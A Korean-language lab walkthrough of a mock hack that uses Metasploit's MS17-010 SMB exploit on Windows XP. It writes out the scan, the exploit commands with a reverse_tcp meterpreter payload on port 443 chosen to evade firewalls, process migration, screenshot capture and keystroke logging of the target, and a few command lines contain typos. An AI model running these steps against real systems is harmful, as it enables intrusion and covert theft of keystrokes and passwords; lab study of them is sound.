PC keylog 레코딩 해킹

SMB 프로토콜 취약점을 이용한 칼리 메타스플로잇 모의 해킹

---

실제 모의해킹 과정은 아래 영상을 참조(공격자 Kali 서버의 GUI 화면에서 스크린 캡처된 이미지 파일을 확인하는 장면과 공격 대상 Windows 서버에서 동작(타이핑) 과정의 화면은 가이드라인에서 확인 요함)

1. CVE 취약점 리스트 정보

2. 모의해킹 가이드 라인

Meterpreter 쉘 침투를 통한 공격 대상자의 PC keylog 레코딩

공격 구성도

smb_ms17_010.rb 모듈 이용한 침투

영어 버전 윈도 XP 서비스팩 2의 넷바이오스(SMB, samba) 서비스 취약점을 악용해서 미터프리터(meterpreter) 쉘환경을 제공받기 위한 공격 대상의 운영체제 침투

1) 미터프리터(meterpreter) 쉘로 침투가능한 모듈인 ms17_010_psexec를 사용하고, reverse_tcp 악성코드(페이로드)를 세팅해서 공격 대상의 시스템을 침투함.

SMB 프로토콜 취약점을 이용한(reverse_tcp 페이로드) PC keylog 레코딩 해킹

2) 미터프리터 쉘을 획득하면 공격자와 공격 대상자 사이의 연결을 지속적으로 유지하기위한 설정(migrate)을 윈도 운영체제에서 사용하는 쉘(explorer.exe) PID(Process ID)로 공격자 페이로드(bind_tcp.rb)를 이식(migrate) 해야 한다.

3) 공격 대상 시스템의 바탕화면 캡처

4) 공격 대상(Windows XP on VMware) 시스템 바탕화면

공격 대상(Windows XP SP2)의 현재 바탕화면

5) 공격자(칼리 GUI) 환경에서 공격 대상자의 바탕화면을 캡처한 파일을 통해서 확인

캡처한 바탕화면을 공격자(Kali Linux)의 GUI 환경에서 확인함

키로그(keylog) 레코딩

키로그_레코딩을 하는 파일은 화면의 디렉터리 경로 하위에 있다(keylog_recorder.rb)

미터프리터 모드에서 run post/windows/capture/keylog_recorder 명령을 통해 공격 대상의 시스템에서 키스트로크(타이핑)가 이루어지는 것을 레코딩

공격 대상의 시스템에서 notepad를 실행시킨 후 간단한 메시지를 타이핑해본다.

이후 공격자(칼리 미터프리터) 시스템에서 CTRL + C 키를 눌러서 인터럽팅을 시킨다.

/home/dan/.msf4/loot/ 디렉터리 하위로 들어가면 방금 전에 타이핑한 키로그를 저장한 텍스트 파일을 통해 확인할 수 있다.

공격 가능 여부 운영체제(Target servers) 확인 구문

use auxiliary/scanner/smb/smb_ms17_010
set rhost 192.168.100.136
set threads 256
run

윈도 서버 XP Pro 64bit SP2 버전 쉘 권한 탈취 공격 모듈(기본) 구문

use exploit/windows/smb/ms17_010_psexec
         set payload windows/meterpreter/reverse_tcp
         set rhost 192.168.100.135 (공격 대상자)
         set lhost 192.168.100.58 (공격 로컬 서버)
         set lport 443 (로컬 포트) ← 방화벽 우회하기 위해 443(HTTPS) 포트로 설정함.
         exploit (미터프리터 쉘 획득)

공격 대상 서버의 키로거 레코딩 구문

ps -S exploere (공격 대상 서버의 윈도우 운영체제에서 사용하는 쉘 프로세스 ID 확인)
migrate 380 (공격자가 주입한 페이로드(2060)를 윈도우 운영체제의 GUI 쉘(380)로 이식과정)
screenshot (공격 대상자 바탕화면 캡처)
run post/window/capture/keylog_recorder (키로거 레코딩 실행)
ctrl + c (인터럽팅)

해당 취약점(SMB 포트 open) 관련 제반 지식
SMB 포트란 무엇입니까? 포트 445 + 139 |에 대한 자세한 설명 업가드 (upguard.com)